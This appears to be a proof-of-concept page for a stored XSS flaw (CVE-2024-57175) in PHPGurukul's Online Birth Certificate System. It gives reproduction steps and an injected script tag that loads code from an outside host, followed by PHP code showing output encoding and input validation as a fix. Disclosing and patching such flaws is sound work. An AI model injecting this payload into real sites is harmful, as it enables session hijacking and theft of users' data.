CVE-2024-57175 PoC — PHPGurukul Online Birth Certificate System security vulnerability

Associated Vulnerability
Title: PHPGurukul Online Birth Certificate System security vulnerability (CVE-2024-57175)
Description: A Stored Cross-Site Scripting (XSS) vulnerability was identified in the PHPGURUKUL Online Birth Certificate System v1.0 via the profile name to /user/certificate-form.php.
Readme
CVE-2024-57175: Stored Cross-Site Scripting (XSS) in PHPGURUKUL Online Birth Certificate System v1.0  

### Description  
A stored Cross-Site Scripting (XSS) vulnerability was identified in PHPGURUKUL Online Birth Certificate System v1.0 in the /user/certificate-form.php page. It allows an authenticated user to inject a script payload into the profile name field, which can lead to code execution on the client side.  

### Steps to Reproduce (PoC)  
1. Navigate to the vulnerable URL as an authenticated user: /user/certificate-form.php.  
2. Modify the profile name with an XSS payload, for example:  
   ```html
   "><script src="https://severurl"></script>
   ```

### Impact  
Successful exploitation may allow attackers to execute arbitrary JavaScript on the client side, potentially leading to data theft, session hijacking, or other malicious actions.  
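
A mitigation sketch for the issue described above, added here as an example and not taken from the PHPGurukul code or the original README: it renders the profile-name value from the PoC into an attribute with and without output encoding, then parses the result to count the `<script>` elements a browser would create. The field name `fullname` and all function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added illustration; not code from PHPGurukul. The field name "fullname"
// and all function names are hypothetical.

// Vulnerable pattern: the stored value is concatenated into an attribute as-is.
function render_name_unsafe(string $stored): string
{
    return '<input type="text" name="fullname" value="' . $stored . '">';
}

// Hardened: encode for the HTML attribute context at output time.
function render_name_safe(string $stored): string
{
    $encoded = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="fullname" value="' . $encoded . '">';
}

// Defense in depth at write time: letters, marks, spaces and . ' - only.
function is_plausible_name(string $name): bool
{
    return preg_match('/^\p{L}[\p{L}\p{M} .\'-]{0,99}$/u', $name) === 1;
}

// Parse the markup roughly as a browser would and count <script> elements.
function count_script_elements(string $html): int
{
    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc->getElementsByTagName('script')->length;
}

// The profile-name value from the PoC steps, plus a constructed benign name.
$payload = '"><script src="https://severurl"></script>';
$benign  = "Anne-Marie O'Neil";

printf("unsafe render, script elements: %d\n", count_script_elements(render_name_unsafe($payload)));
printf("safe render,   script elements: %d\n", count_script_elements(render_name_safe($payload)));
printf("validator accepts payload: %s\n", var_export(is_plausible_name($payload), true));
printf("validator accepts benign:  %s\n", var_export(is_plausible_name($benign), true));
```

Output encoding is the primary fix because it holds for every page that displays the stored name; the write-time validator only narrows what can be stored.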

### Credits  
Discovered by Ajmal, January 2025.


### Reference
https://github.com/Ajmal101/CVE-2024-57175.git